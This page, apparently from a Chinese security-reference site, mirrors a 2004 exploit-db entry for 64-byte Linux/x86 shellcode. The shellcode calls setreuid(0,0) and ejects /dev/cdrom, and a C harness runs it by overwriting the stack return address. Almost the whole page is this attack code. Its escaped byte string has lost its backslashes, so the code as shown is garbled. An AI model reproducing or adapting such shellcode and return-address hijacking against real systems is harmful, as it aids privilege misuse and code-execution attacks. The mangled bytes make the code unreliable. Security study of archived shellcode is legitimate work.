Linux/x86 – Eject /dev/cdrom Shellcode (64 bytes)

Linux/x86 – Eject /dev/cdrom Shellcode (64 bytes)

漏洞ID 1054654 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-Linux/x86 – Eject /dev/cdrom Shellcode (64 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – Eject /dev/cdrom Shellcode (64 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13439
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
        CDROM EJECTING CODE by lamagra

.data
.globl main
        .type    main,@function
_start:
        # setreuid (0, 0)
        xorl %eax,%eax
        xorl %ebx,%ebx
        xorl %ecx,%ecx
        xorl %edx,%edx
        movb $70,%al
        int  $0x80

        jmp 0x21
        popl %esi
        movb %edx,10(%esi)
        leal (%esi), %ebx
        # open("/dev/cdrom", O_RDONLY|O_NONBLOCK|0x4, 666)
        movb $5, %al
        movw $0x804, %cx
        movw $666, %dx
        int $0x80

        movl %eax, %ebx

        # ioctl(%eax, 0x5309, 0)
        movb $54, %al
        movw $21257, %cx

        int $0x80

        # exit(0)
        xorl %eax, %eax
        xorl %ebx, %ebx
        inc %eax
        int $0x80
        call -0x26
	.string "/dev/cdrom"
*/
#include <stdio.h>

char eject[] = 
"x31xc0x31xdbx31xc9x31xd2xb0x46xcdx80xebx23x5ex88x56x0ax8d"
"x1exb0x05x66xb9x04x08x66xbax9ax02xcdx80x89xc3xb0x36x66xb9"
"x09x53xcdx80x31xc0x31xdbx40xcdx80xe8xd8xffxffxff/dev/cdrom";

main() {
        int *ret;
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%dn",strlen(eject));
        (*ret) = (int)eject;
}

// milw0rm.com [2004-09-26]

相关推荐: Koch Roland Rolis Guestbook 1.0 – ‘$path’ Remote File Inclusion

Koch Roland Rolis Guestbook 1.0 – ‘$path’ Remote File Inclusion 漏洞ID 1054256 漏洞类型 发布时间 2003-11-17 更新时间 2003-11-17 CVE编号 N/A CNNVD-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享